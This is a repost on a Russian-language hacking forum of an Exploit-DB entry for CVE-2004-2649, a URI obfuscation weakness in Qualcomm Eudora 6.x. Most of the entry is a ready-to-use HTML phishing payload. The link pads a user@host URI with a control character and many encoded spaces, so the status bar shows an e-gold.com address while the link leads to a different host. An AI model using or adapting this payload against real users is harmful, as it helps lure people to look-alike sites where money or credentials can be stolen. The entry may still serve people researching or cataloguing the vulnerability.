Exploit Qualcomm Eudora 6.x - Embedded Hyperlink URI Obfuscation

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
24098
Проверка EDB
  1. Пройдено
Автор
BRETT GLASS
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2004-2649
Дата публикации
2004-05-08
Код:
source: https://www.securityfocus.com/bid/10305/info

It has been reported that the Qualcomm Eudora MTA is prone to a URI obfuscation weakness that may hide the true contents of a link. The problem occurs when a user@location URI is formatted in such a way that a "^A" control character is located after the user value. The user value may then be appended with space characters to obfuscate status bar and mouseover details. It is said that, when doing a mouseover of such a URI, it will cause the status bar to only display the contents of the user value, not the entire link.

<a href="http://www.e-gold.com^A
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
@example.com/"><span lang=EN-US
style='mso-ansi-language:EN-US'>http://www.e-gold.com/alert</span></a><br>

Where example.com, reads egegold.com.
 
Источник
www.exploit-db.com

Похожие темы